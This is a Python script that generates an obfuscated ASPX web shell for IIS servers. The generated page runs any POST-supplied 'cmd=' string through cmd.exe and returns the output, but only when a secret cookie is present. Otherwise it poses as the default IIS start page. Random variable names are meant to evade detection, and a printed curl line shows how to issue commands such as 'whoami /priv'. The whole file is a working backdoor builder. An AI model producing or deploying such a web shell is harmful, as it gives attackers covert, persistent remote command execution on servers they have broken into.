#!/usr/bin/env python3

import os
import re
import random
import string
from textwrap import dedent
from argparse import ArgumentParser

def obfuscate(s):
    pattern = r'\{\*(.*?)\*\}'
    placeholder_values = {}

    def get_or_generate_random_string(match):
        placeholder = match.group(1)
        if placeholder not in placeholder_values:
            placeholder_values[placeholder] = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
        return placeholder_values[placeholder]

    result_string = re.sub(pattern, get_or_generate_random_string, s)

    return result_string

def generate_aspx_backdoor(args):
    code = '200'
    status = '200 OK'
    iisstart_template = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
}

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>'''
    lines = iisstart_template.split('\n')
    processed_lines = ['"' + line.replace('"', '""') + '" & vbCrLf & _' for line in lines]
    response = '\n'.join(processed_lines)
    response = response.rstrip(' & vbCrLf & _')

    backdoor = f'''<%@ Page Language="VB" Debug="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>

<script runat="server">
    Sub Page_Load(ByVal {{*sender*}} As Object, ByVal {{*e*}} As EventArgs)
        Dim {{*cookieMarker*}} As HttpCookie = Request.Cookies("{args.cookie_name}")
        If {{*cookieMarker*}} IsNot Nothing AndAlso {{*cookieMarker*}}.Value = "{args.password}" Then
            Dim {{*command1*}} As String = {{*GetCommandFromPost*}}()

            If Not String.IsNullOrEmpty({{*command1*}}) Then
                {{*command1*}} = HttpUtility.UrlDecode({{*command1*}})
                {{*ExecuteCommand*}}({{*command1*}})
            End If
        Else
            Response.StatusCode = {code}
            Response.Status = "{status}"
            Response.Write({response})
        End If
    End Sub

    Function {{*GetCommandFromPost*}}() As String
        Dim {{*commandParam*}} As String = "cmd="
        Dim {{*command2*}} As String = Nothing

        If Request.HttpMethod = "POST" Then
            Using {{*reader*}} As New StreamReader(Request.InputStream)
                Dim {{*requestBody*}} As String = {{*reader*}}.ReadToEnd()

                Dim {{*cmdIndex*}} As Integer = {{*requestBody*}}.IndexOf({{*commandParam*}})
                If {{*cmdIndex*}} <> -1 Then
                    {{*command2*}} = {{*requestBody*}}.Substring({{*cmdIndex*}} + {{*commandParam*}}.Length)
                End If
            End Using
        End If

        Return {{*command2*}}
    End Function

    Sub {{*ExecuteCommand*}}(ByVal {{*command3*}} As String)
        Dim {{*myProcess*}} As New Process()
        Dim {{*myProcessStartInfo*}} As New ProcessStartInfo("cmd.exe")
        {{*myProcessStartInfo*}}.UseShellExecute = False
        {{*myProcessStartInfo*}}.RedirectStandardOutput = True
        {{*myProcessStartInfo*}}.Arguments = "/c " & {{*command3*}}
        {{*myProcess*}}.StartInfo = {{*myProcessStartInfo*}}
        {{*myProcess*}}.Start()

        Dim {{*myStreamReader*}} As StreamReader = {{*myProcess*}}.StandardOutput
        Dim {{*myString*}} As String = {{*myStreamReader*}}.ReadToEnd()
        {{*myProcess*}}.Close()
        Response.Write({{*myString*}})
    End Sub
</script>'''

    with open(f'backdoor_{args.cookie_name}:{args.password}.aspx', 'w') as fh:
        fh.write(obfuscate(backdoor))

    print(f'[INFO] created aspx backdoor as "backdoor_{args.cookie_name}:{args.password}.aspx"')
    print('[INFO] issue commands with:')
    print('curl http://example.com/backdoor.aspx -H "Cookie: {args.cookie}={args.password}" -d "cmd=whoami /priv" -X POST')


if __name__ == '__main__':
    parser = ArgumentParser()
    parser.add_argument('-c', '--cookie-name', required=True)
    parser.add_argument('-p', '--password', required=True)
    args = parser.parse_args()

    generate_aspx_backdoor(args)